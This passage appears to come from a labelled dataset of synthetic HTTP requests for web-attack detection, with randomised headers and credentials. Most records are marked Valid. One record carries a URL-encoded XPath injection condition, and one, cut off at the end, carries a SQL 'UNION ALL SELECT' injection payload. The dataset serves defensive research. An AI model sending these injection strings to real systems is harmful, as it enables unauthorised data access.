If-Range: "xbR7..XHj5O6EwI"
Max-Forwards: 7758
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: hchos tglefect=mpumcNne
Authorization: NTLM bnhVN3RTeWFoem5kc3lsbHJpY3VlcU9qMDFsbnNlYWJoQXhkZmVsdnJzbg==
Range: 8-388473,6-
Referer: http://www.y32N3ei.fr/tin2T4/dcya/2oSrse.htm
TE: trailers,gzip;q=0.0,chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/7.8 (compatible; MSIE 2.5; Win 9x; sEieyTe; hoiSteih; ordli)
UA-CPU: MIPS
UA-Disp: 4201,0533,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 677x370
Via: 0.6 143.206.80.93, HTTP/6.8 106.52.167.154
Transfer-Encoding: identity
Upgrade: nesh/9.6, Olad57/7.3, mht/9.0, dthE/6.5, Nwteoi/0.9
Warning: 765 24.36.202.0 "ajeMEawyotisp" 
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 1337403720563308
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31446
Start - Id: 49264
class: XPathInjection
GET /adQUjsoga3nedbeIo/4andm6U/CizqTDeisanperc4oes/ogYE4/oU86b-zvfaqo1/fslrg1npso.swf?oev8a2tFktr=yho8onlthib&Xsziafs2oevbH=%28i++++%3C+++++count%28d8sd5e%2Fchild%3A%3Atext%28%29%29+and+++j++++%3C+++count%28rhabi%2Fchild%3A%3Acomment%28%29%29+and+k+++++%3C+++++count%28or1%2Fchild%3A%3A*%29++++%29&nBuysufEmcizrsf=gjxKHyY&eoh3orinJy=qwcpngJ HTTP/1.1
Host: 194.157.159.24:92
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp;q=0.8, iso-8859-8;q=0.8, x-mac-roman, iso-10646-ucs-2;q=0.6, ks_c_5601-1987
Accept-Encoding: gzip;q=0.3, deflate;q=0.5
Accept-Language: eya-eniksrO, u9oic-featst;q=0.1, g-1r9d5i;q=0.7
Cache-Control: min-fresh=6892
Client-ip: 175.132.66.53
Cookie: _CYgxs=2;eIC1=e2WDLt;Yraon=8;m1gg=ftB;ds8pare74kdsed=6QvN3
Cookie2: $Version="395"
Date: Sat, 09 Aug 08 04:17:29 CET
ETag: W/"jGu3szARAyYEzvM"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Wed, 20 May 09 03:32:47 UTC
If-Match: *
If-None-Match: "DMd1uBrJCgw4A5B"
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 76
MIME-Version: 1.6
Pragma: alyocs='Taphns'
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: Digest uri=/epovu94.php4
Range: 560-83908
Referer: http://teutyu.it/orkhc3te/eetoPet/iaih/cbne.mpg
TE: gzip;q=0.5
Trailer: TE
User-Agent: Mozilla/2.4 (compatible; Konqueror/1.8; Win 9x; bobl8ptc)
UA-CPU: x86
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 4.5 159.216.184.16, 6.0 164.19.24.113, 3.6 78.61.205.214
Transfer-Encoding: compress
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49264
Start - Id: 29489
class: Valid
GET /eiy/mUQ/qWwTh6kX9JXL1q6ZIVit/9C/rp8sShzenioao/imee/xFPNJ_DUK/exd-PMj.3noCm/EacdvefhleTaeRe.gif?okTpyt=33586&nhS=4s&ek3exOE0ol=at%5DIostee&XC.VGinputSFQj=%3Eg5%5Da&0nAwsowwBd=mBistrvvo&cbLoedyl0=60&edeab=t7as%40%26einclude8Lsc&ok=nege&s3ejnntreWut=49726&okKdsupeo=o&1aor7lEtTrerea=thlinkasrcpoc%29s9au HTTP/1.0
Host: www.t0crf.it:3671
Connection: close
Accept: application/*, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, identity;q=0.8, identity, deflate
Accept-Language: Ed-ln;q=0.2, famtmbys-ir0et;q=0.8, s3tse1b-cifentn;q=0.8, 2h0r-tjnftqT;q=0.7, MCtkoe-eet
Cache-Control: no-cache
Client-ip: 12.169.110.212
Cookie: qan4e=9ai'n;Ss4birEeentdQb=hw90rMK9SPK5;skneieOgtm=ol
Cookie2: $Version="626"
Date: Thu, 15 Dec 05 24:30:08 CET
ETag: W/"wUZdMJW-5GbCkeQQdz_"
Expect: uneeteg
From: hnoyso@ioJaegaa.st
If-Modified-Since: Tue, 20 Sep 05 05:44:53 UTC
If-Unmodified-Since: Sun, 08 Apr 07 01:47:59 CET
If-Match: "boE8VfV65i-q3Qd6uOJ"
If-None-Match: "MbmAiwYg2ali60hBmVFR"
If-Range: Sun, 22 Nov 09 04:32:31 CET
Max-Forwards: 918
MIME-Version: 3.9
Pragma: rnm=ot
Proxy-Authorization: Basic N2x1MjpjdzdyZXM=
Authorization: e2sl hebggrp=shcoOps
Range: 6551-
Referer: /aneoaat/EemrbsD.txt
TE: chunked,gzip;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/0.7 (Windows; U; WinNT 9.6; te-pl; rv:9.1.9) Gecko/70569697
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: 9.6 54.168.60.135
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 270 101.148.72.64:95 "i8edoTSEtsz" "Wed, 28 Dec 05 21:22:16 CET"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29489
Start - Id: 14635
class: Valid
GET /bL5j4T0Xlf72YOH0R/msiimteluatbse/qs3ErCu/n-NjPokui@FX4p@/Mg/h7r.nsf?75dnpe=onieelB7rb3rs&0n7osyi=sd&TROmetaDoa9i1=akle&ymmsdppicfittfm=i&9aLIautoexecU5A7oca=393&zgO6=wgettwemRiles+%5Cs6t%7C&Yteiss=rAeNyi5as3a&vtywI9Zeval9S=iTzcRtokeh&nohchtgepEal=ghme6e%7Egce1&neasa8u=33398977&E1iiuafeaa=a8a HTTP/1.1
Host: www.aep3nhS.gov:4307
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 45.86.96.12
Cookie: OAuzRwT=eO-MFndGw.;i5tfo=e5q;tanl=7932;eeonjpE=r;tra=noHMdTC
Cookie2: $Version="9"
Date: Sun, 14 Jun 09 14:41:59 GMT
ETag: "x6eT1qHW17aeJ4b"
Expect: ueloxn=hc6rtTac;S0hmbieo
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Wed, 30 Jul 08 05:04:56 GMT
If-Unmodified-Since: Thu, 06 May 04 13:23:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 3.5
Pragma: eoelxtN='ka7mcn'
Proxy-Authorization: Digest nc=Abd7c6e4
Authorization: 2bia0d edzt=ctecNuon
Range: -1985,-630784,-87
Referer: http://www.uiNtRO.biz/Onra/rorN9ta/tt58tcTm/y3onn.gif
TE: trailers
Trailer: Authorization
User-Agent: e5miUg http://www.ihtr.de
UA-CPU: MIPS
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 518x165
Via: HTTP/4.6 www.piscls8.js
Transfer-Encoding: 5eOdx; 2sqc=ajjw
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 713 www.sdys.jpeg:780 "dc7ns" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 29846910
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14635
Start - Id: 17324
class: Valid
GET /dWs_eoV3/ev3wC/oTDg02ZvJ/t@cPfcLP8yu1sX4rlNf/0XJRJ7tWZpssynk/e46/bplebfeVg.bin?O4Y5bWecho3=5641646930&Onb=kaceffnhedilKa8sa&et4=jfZkHNOSA&rtsunwacsoe1Ed=ced3r8Iadnxtme53&i2eeamcheowz=irO&drx9ojujtdu=19&akwgci8a=97081&5ts=0659046&ytliRlys=v9Db6&mlaa18aB=ctpi%3E+rmail%404ud&nrerfub6t=41422101&cc2uytesnsh=seos&aVmenz=73&ri=2034781484 HTTP/1.0
Host: 114.75.116.29
Connection: keep-alive
Accept: audio/x-wav, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, gzip, identity;q=0.6
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 251.211.186.188
Cookie: g7Eer0rdaedS=thogHuOls;atu8=s72;rbDsn=8gexNyxs5r;9@Nl=eR2tc/xa<
Cookie2: $Version="3"
Date: Wed, 15 Nov 06 20:48:13 UTC
ETag: "QVMqCuT5TpXXe2D"
Expect: 100-continue
From: Ziuts@vomg5.it
If-Modified-Since: Tue, 09 Feb 10 23:04:46 UTC
If-Unmodified-Since: Wed, 08 Apr 09 13:22:18 UTC
If-Match: "I.wGilXaHgjdy5N"
If-None-Match: "JhVZ@tv.XdXvrzLTy"
If-Range: *
Max-Forwards: 402
MIME-Version: 0.0
Pragma: he=fn7ox
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: NTLM ZXJzWkVvN2VlcmVlb2V2aWVrbG5zdGVlbXNwZGFvbnNocGd0
Range: 570800-
Referer: /o4rawt9/abh3ik/Ieisqn.tiff
TE: trailers
Trailer: Range
User-Agent: cbluai9iam5ho3u
UA-CPU: 68000
UA-Disp: 8556,725,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 455x7663
Via: 2.8 158.31.122.5
Transfer-Encoding: identity
Upgrade: l1tl/9.7, tTA/1.4, Lrza/1.6, teih/1.3, hisHs/2.3
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 8125405037849
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17324
Start - Id: 32179
class: Valid
GET /5wajtPp.mspx?Ua_W._pSe=st5oer&iNsyytEnionsdt4=oMDbO&tiurde=677&fjtdiaiienyudso=561813&qn2g@2Cv=hame&Hsfttic9senrTv=arntia4eshutdownls7l4&tulrcmcdes=rmm&eshr=cwa&ieIojo0s=85 HTTP/1.1
Host: www.eigote.it
Connection: oe0nelyd
Accept: application/*;q=0.1, audio/*;q=0.7
Accept-Charset: gb2312;q=0.5, iso-2022-kr, x-mac-korean;q=0.0, x-mac-icelandic;q=0.3
Accept-Encoding: gzip;q=0.6
Accept-Language: i6-Witdfj, E-pNonA6;q=0.7
Cache-Control: only-if-cached
Client-ip: 198.247.155.21
Cookie: uguoverTatrbrhe=4n;ssupiv=uAe4olodgT;igsntewjc6nc=Tde;mEt=2405901350
Cookie2: $Version="770"
Date: Tue, 14 Dec 04 01:44:13 GMT
ETag: W/"1okxnce69WdrEIIq"
Expect: 100-continue
From: Awnhel9h@1h2kcie.be
If-Modified-Since: Sun, 26 Feb 06 11:31:03 GMT
If-Unmodified-Since: Sat, 02 Jul 05 12:47:28 CET
If-Match: "Urz2GtBOwi@Jzgy0"
If-None-Match: *
If-Range: "79kjn6TzVRBfq0MXODY"
Max-Forwards: 7
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: werm rnqahTl=Rnzd2
Authorization: NTLM MHBSa2NldGhOZHdTcmE4ZXBoZ25lYTFyT2F2RWJ0c2Jlbm5zbw==
Range: 9707-,3-93
Referer: /VfeIAuc.js
TE: trailers,gzip
Trailer: Expect
User-Agent: cedana/6.3
UA-CPU: Sparc
UA-Disp: 8263,026,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 320x815
Via: FTP/7.1 145.26.254.137
Transfer-Encoding: deflate
Upgrade: arx0t/5.9, nloymn/5.4
Warning: 006 www.atnuej.css "tOivnyllv" "Tue, 15 Jun 04 03:48:59 GMT"
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 99968202
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32179
Start - Id: 3431
class: Valid
GET /mCY.S/zl8HZ/iH@fU.-gP/httpstyCnph-jmexeca-ftpf/sEJrv5oe6RBj/S68eieoHt8ress/nhai/blogiframeJRtwgetvYY/H3l2enaqalt8en7.tiff?renn=3iaoreafn%24e&Txuuega=ihsselecthenB&eltpiX=aqDcRi&rthNttQ=ulC&9tecmoouepnkae=048440&moEnrwhA=6335&eeSl0dh7r7b=ainput&vL7ACjj=nwfGmDWYwt HTTP/1.0
Host: 173.114.167.14:80
Connection: keep-alive
Accept: text/*, audio/basic
Accept-Charset: x-mac-greek
Accept-Encoding: *;q=0.2
Accept-Language: siEeedr-rT0n, ed-5r;q=0.9, sa-mhEeplb;q=0.4
Cache-Control: max-age=41825
Client-ip: 120.58.88.240
Cookie: ctarAoxu=7056589;Iilloh=55608
Cookie2: $Version="748"
Date: Fri, 29 Apr 05 10:17:29 UTC
ETag: W/"-ux1L@tJgN0cXsjizl_"
Expect: sstme=eTehehs;lsJr=etacnI
From: otEj@3satd.de
If-Modified-Since: Wed, 16 Apr 08 02:27:40 CET
If-Unmodified-Since: Mon, 13 Oct 08 15:36:53 GMT
If-Match: "i4piovc2Bj8ES3w"
If-None-Match: "fa-hvVmvDWkgAeS-xYTO"
If-Range: Tue, 04 Sep 07 11:34:54 UTC
Max-Forwards: 00
MIME-Version: 5.4
Pragma: hrirta=htes0y
Proxy-Authorization: Digest response="FE0E6b5BFFCfDCda4e93Ab8BFb700c11"
Authorization: nzioet atbD=jemntjS
Range: -79,44302-,67-20461
Referer: http://www.h1o2oHs.st/noIEa/tsuoetp/dYaMnTe.asmx
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 0.8; os-ah; rv:1.9.7) Gecko/96977894
UA-CPU: MIPS
UA-Disp: 627,2976,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 969x7653
Via: HTTP/5.8 www.Lo5eRl.jpg, HTTP/6.5 www.shIhenir.css, 8.5 203.149.62.120
Transfer-Encoding: shoy
Upgrade: rdse/9.1, lomd/5.7
Warning: 682 122.84.45.120 "hiq8gwIlahfmhHa" 
X-Forwarded-For: 60.74.245.251
X-Serial-Number: 80963840971
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3431
Start - Id: 2068
class: Valid
GET /iCxwqaJ5Vgp3mES/g@SXH7/z1-pW/r0R9_U8FG/hlSlmTfSfTfknQeiy8RJ/PEd6sock_streamnhO/iEeTHew0sh4zos9deeoS/bacsIXuwhyfIp@CCImzm/cwkp6tszDKh_7M5/ecUxl_x1rq/fMPELqVsN/uqPTRyglC-O.png?kbinNMLa=Sfso&bssu1sueemt4ec=sccsystem&8h=4264&ttohketwreop=fob3sj5ml04&tv=r5Xu&egesEcjril=62&rcnf=d&z2saoteu=otQuaN&nincmEio8oackt=AdyE3p9ao&eeeym=7 HTTP/1.1
Host: www.u8hyen.st
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: nat-ri;q=0.9, T-y;q=0.3, weic-Bbgd, dneW6on-F, nrta9-tfT
Cache-Control: only-if-cached
Client-ip: 160.70.47.198
Cookie: QBaZlink=1457805908;mow=Fo;prsnohSasl=usr706irihrlsor;uo7ee5eiA=lehsaibnre;;ePArasdUfLhmcs=nphp;fnipoi01ioMueie=gFoIQBKz
Cookie2: $Version="4"
Date: Sat, 14 Oct 06 02:42:33 GMT
ETag: "CqKJhzj3js0ETbABe"
Expect: xglpw
From: Iosu@aert5hd.ch
If-Modified-Since: Fri, 07 Dec 07 24:00:40 UTC
If-Unmodified-Since: Fri, 12 Aug 05 06:03:35 CET
If-Match: "hP79C.Z6DHcCJ6_"
If-None-Match: *
If-Range: Tue, 23 Nov 04 14:02:19 CET
Max-Forwards: 6180
MIME-Version: 9.0
Pragma: tmrcncsw=eUo0
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: hipejj svrag=efreaAt
Range: -74,-25
Referer: http://R5eheee.st/ao9o/en70wa/tot9tIlo/s0cd2tC8.msf
TE: trailers,gzip
Trailer: TE
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 1.6; ts-Am; rv:0.5.1) Gecko/39987525
UA-CPU: StrongARM
UA-Disp: 0185,510,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9053x775
Via: FTP/5.3 www.eE7On.gif:80716, 7.5 www.oLman.css
Transfer-Encoding: compress
Upgrade: wleh/1.8
Warning: 400 160.120.60.102 "ocuetceo" 
X-Forwarded-For: 94.2.250.161
X-Serial-Number: 82872435333808
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2068
Start - Id: 15321
class: Valid
GET /Ler/foE9t7ngnqcns/2Z81EbopenhTD3/ott1nodtN/TCcP9G8ijAD/hkXp_18Fl0w3tIHlP/Qwu6Usgcrhq1Bx/gu6dpxc24.P4JD9/bodyMTLp/sAmturaseGf8e9tis/p7e3tno8toymnomesN/ooeli0owoltNTst.html? HTTP/1.0
Host: 207.254.199.63
Connection: close
Accept: audio/basic;q=0.6, image/png, application/zip
Accept-Charset: iso-8859-5;q=0.6, iso-8859-9;q=0.8, us-ascii
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 11.219.68.244
Cookie: Ereednamvrepwu=aal;sa;sand4op8=xAz;etfithe=oqvNl.hv6FjF
Cookie2: $Version="3"
Date: Sun, 30 Dec 07 17:24:51 GMT
ETag: "Y0YUWysM8GX6fXC8j"
Expect: 100-continue
From: sbR2u@rgtt.st
If-Modified-Since: Thu, 05 May 05 04:57:55 GMT
If-Unmodified-Since: Fri, 08 Dec 06 20:31:47 CET
If-Match: "1AP-dGaHg8C.t1_"
If-None-Match: *
If-Range: "Z8OTzTYs-i6-LSg3cKV0"
Max-Forwards: 841
MIME-Version: 7.7
Pragma: hJIlre='9rxtr'
Proxy-Authorization: a3ashh fyuhrze=uoTtep0T
Authorization: yLu3l tXerU=oifn
Range: 604-0,1-54,-12
Referer: /iKrfl/shshl/Rdtey/naai0tre/coao.exe
TE: gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/3.1 (X11; U; Unix 9.3; bt-az; rv:5.6.6) Gecko/33096240
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9424x098
Via: HTTP/1.3 www.tsih.png, 8.9 www.qei0ma.jpeg, 3.5 93.6.97.2
Transfer-Encoding: gzip
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 212 241.201.10.100 "aape9noawei" 
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15321
Start - Id: 19354
class: Valid
GET /oOwAa/pD/Jgme7utrimoisaz/KT/nmonoptSl/%uAi6sWobjectZ9/dTGGxob26n@6bEsQlYc/rLeiplicdordn9dns0no/sp.9g@tGtPMKBEqr.asmx?issgcukehvtdie=ho&hwaninlbo=zhshlhrsdehrSdo&6ehtoemsjtu=lTratdrQ9dm7uln&oegrsde0me=ty+da%3Crie6eehe2&eebverneuanqN=samf%7Ch%3Biwherel79uaba&3ao=eTahijoe%29hcni%5Di&mlnl=a.T&eda9waknil83nW=787&uyn=49s%3Emid%27ltd&i2Yxte=tE&79tnp=servicesa&icNe3vRko=%25iu HTTP/1.1
Host: 77.124.161.37
Connection: close
Accept: application/*;q=0.3, image/gif;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 210.226.84.255
Cookie: Rieylohsu4i=6907;ce4hwuhinpEtkZ=02309;8hrzit=nkjHEZHZk;lanRev=EProO80
Cookie2: $Version="84"
Date: Thu, 05 Aug 04 05:09:30 GMT
ETag: W/"7Sx2WhrqLQQ@nr1t"
Expect: Rama
From: eNaay@rjRtebre.biz
If-Modified-Since: Wed, 04 Nov 09 11:01:27 CET
If-Unmodified-Since: Tue, 22 Jun 04 04:25:38 CET
If-Match: "3-ConxN4nJMhZoW"
If-None-Match: *
If-Range: "OvYwWwz1zhlsfLWEU8TU"
Max-Forwards: 754
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic bmZydGM6ZGVlYQ==
Authorization: NTLM aWRxNFZvbHJuc2F1MmJlc2VlaHRlN2RpdGVldXdDcmVhbm9lbA==
Range: 80-
Referer: http://eyYar.be/gxHx/wdkits.mdb
TE: trailers
Trailer: If-Match
User-Agent: amforojt (eBP7aB; lDYC6oj@vR; siP-e.JK; dpYg7JpMQ)
UA-CPU: StrongARM
UA-Disp: 674,7588,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x2255
Via: TdzroE/4.3 74.234.201.217, 2.5 www.ta2e.shtml, HTTP/7.5 141.241.158.188:58
Transfer-Encoding: deflate
Upgrade: ma71z/4.6, eysee/5.2
Warning: 825 www.3Eothdos.gif:29220 "iow9t" 
X-Forwarded-For: 106.216.193.253
X-Serial-Number: 04731684394484360206
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19354
Start - Id: 21692
class: Valid
GET /bl3np/ga@E96arSG-m_v-1rp/oKwk/0GBYMU9L8.JkCzhBgP/iG_FeF4R2S.4rV3/orGSU@dYK7NTGU5@LwQ/t0.php3?innhtlrf1Unrnrt=6663748806&n-R4Lz=esm&copysock_streamXecho3Q=ncPs0G&dgPy6secmmcg=o9kesAetR&ekifthAtoae=mAyl&tokac18iue1emi=92644047&5rzttvau=ndF2 HTTP/1.1
Host: www.hE2oe.org:5
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-932, utf-8
Accept-Encoding: *
Accept-Language: uioehi-nEmrdi;q=0.4
Cache-Control: no-transform
Client-ip: 240.217.117.249
Cookie: hyidreifmWoE=70\bzusew;nsmciWn=trI;ctT4hsIfnpycts=2nrkds;vf51ea=aEform;tiaya9oiV=e/'utIeae
Cookie2: $Version="9"
Date: Mon, 09 Apr 07 03:53:43 CET
ETag: W/"Dv1uMP8Hv4QitlIlBLDW"
Expect: suti=AmRw
From: hrhe@thdtgL.uk
If-Modified-Since: Wed, 20 Apr 05 07:29:06 UTC
If-Unmodified-Since: Tue, 11 Sep 07 09:03:11 UTC
If-Match: "@slnfGhoht-bB.966r"
If-None-Match: "HKfL5-tEfHfLMstF"
If-Range: *
Max-Forwards: 72
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: zlkAcr cnfcci=ifhphtEe
Authorization: Basic bmxsb286bmd5cmRvbzg=
Range: 6854-805189,4305-14775
Referer: http://eeret.com/udet/hashjaeN.jpeg
TE: trailers,trailers
Trailer: Via
User-Agent: o7xD@eJXU http://www.9sWyfi.cz
UA-CPU: StrongARM
UA-Disp: 6270,1333,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 664x378
Via: FTP/3.5 18.73.35.92, nmiF/0.0 227.211.153.231
Transfer-Encoding: gzip
Upgrade: Abae/9.2, 23ehie/8.6, esDl/9.5, y7tfvd/4.7, aiC/7.6
Warning: 604 www.tas1nyu.js "Uehtn0hm2ptete" 
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 07885
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21692
Start - Id: 15624
class: Valid
GET /mYJmcFn/elZa/dmLpefboo/z7./hsmnxryOti/czE3i31HlSW4gtT4/WscriptkV9Giframef/ta0hh8shoddgesq.gif?Q9positionGKmbf=8m-oyai&hhe=vaham3hnhek8anbdyd&aIA4tdIeOvyl7tv=3&hen=37092 HTTP/1.0
Host: www.4rto.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, iso-8859-15, iso-8859-5, x-mac-hebrew;q=0.9, euc-cn;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 14.162.36.233
Cookie: ehyinpzh=0;ieonw=iQzU0Me;z0Worp=com8opddnnh
Cookie2: $Version="681"
Date: Fri, 08 Sep 06 20:18:51 CET
ETag: W/"12NQOr7jXUOXeYr"
Expect: eE1lApe=antdoo;tnod=inuei
From: tre3@eoezisahr.net
If-Modified-Since: Tue, 04 Oct 05 12:32:22 UTC
If-Unmodified-Since: Fri, 11 Jan 08 01:01:13 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 9.3
Pragma: i=1s6vrir
Proxy-Authorization: Digest cnonce="4yXR"
Authorization: NTLM b2had1RtZXZPbmlvbWI5Z29VdHNyckh0U3M1ZWVsbmVnZXN1eWVh
Range: 3-,76842-90
Referer: http://jqkNt.org/i6pse4/oSOeh/ahdofex.asp
TE: trailers,chunked
Trailer: Connection
User-Agent: wi9kytuop (nCZvaJ-90P; e0ZsfJr_; fJ6Tac; n0PRN7jU; uoCfsiZ)
UA-CPU: PowerPC
UA-Disp: 331,063,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: bne8b/6.4 207.154.161.35, bta/0.3 170.53.124.136, 2.8 www.asiobv.html
Transfer-Encoding: compress
Upgrade: aih/4.7, ohs/5.1
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 15624
Start - Id: 14818
class: Valid
GET /oGEyNoa0LQQAt/srbtqLOQH-WsbYd6Sig/hnx9dHPq8l/unFI4ymu.pl?vieG2nuixac=649325&8Y.R3Vb.e1=18023&r0tnEtehqp0tirI=ejk7hc&iqn5rad=fdgIWV&tjob0nlOery=nv HTTP/1.1
Host: www.lmpibh.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ye8-snstu;q=0.3
Cache-Control: max-age=178
Client-ip: 237.183.88.12
Cookie: iwoiae8o=dsO8nc/mf3GY;.M_DZ.IAWT=167205
Cookie2: $Version="50"
Date: Sat, 08 Mar 08 06:25:52 GMT
ETag: "@YJbQ6omN6hSwxhW"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Tue, 09 Mar 10 09:39:09 GMT
If-Unmodified-Since: Thu, 29 Jul 04 22:51:00 CET
If-Match: *
If-None-Match: "Wi2@zuqsM7Tx3nL"
If-Range: ".jMEGjbQlXholOpa-Og"
Max-Forwards: 3240
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: gresSi t3uet=opnt
Authorization: Basic aWRuSW9peTpzYWFpTjBuYw==
Range: 846913-
Referer: http://www.op0r.fr/drhpiRa/hhIech.php
TE: deflate
Trailer: Date
User-Agent: prRudeo/0.1.1
UA-CPU: MIPS
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1451x6345
Via: 8.2 45.41.121.181, aen5D/1.0 www.t9Lns2.jpg, 2.3 1.61.41.125:94
Transfer-Encoding: compress
Upgrade: altl/2.2
Warning: 387 165.171.90.131 "hiaiten8hm8" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14818
Start - Id: 42331
class: SqlInjection
GET /yJq220Cdd0gwQHq2rV./hoeeras/8nullT1oCe_metaq7/ib5OZfoGD5bG/qbPdf-_38gPMj26NQcK/trr3CF9orAufKx/7scriptUXAx@Wzrk/et4cAeEsodq/mRklQhP-3XGb9/r3sdnn9c5s4lus3H/ohe3empc.png?eh=eaoloiinmehEtcr&syeaae2Is2=33180&pJ9MecatXQx3=iAlo192iatec8&at=%27++%29++++UNION+ALL+SELECT+8++++FROM++++tfm55eeomi+WHERE+++++%28+%27%27%3D+++%27&aEPemxr7b=reuE9tD+e7mnuig&4a7ay=969&yudsdiic=1%3Epmihoi+ HTTP/1.1
Host: 4.155.80.105:13
Connection: ahptos
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, identity, compress;q=0.3, compress, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 59.166.67.8
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="653"
Date: Mon, 21 Feb 05 08:17:34 GMT
ETag: "_05h89GLjeFPIMmU"
Expect: tSrqeree=81oy1B
From: dtce1iim@oe8uountoe.de
If-Modified-Since: Wed, 23 Sep 09 02:10:13 CET
If-Unmodified-Since: Sun, 27 May 07 11:51:22 GMT
If-Match: "b570d2JRlzPth825x"
If-None-Match: *
If-Range: Thu, 08 Nov 07 07:17:15 UTC
Max-Forwards: 256
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -416,3-,-523324
Referer: http://1et3bd.biz/talrxsbo/i2De.mdb
TE: trailers,deflate,trailers
Trailer: User-Agent
